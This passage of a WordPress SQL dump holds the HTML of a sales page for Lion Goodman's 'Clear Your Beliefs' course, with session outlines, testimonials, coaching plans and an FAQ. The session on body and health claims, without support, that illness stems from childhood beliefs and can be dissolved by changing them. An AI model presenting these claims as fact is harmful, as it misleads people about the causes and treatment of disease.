src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 01:08:11', '2014-06-19 06:08:11', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
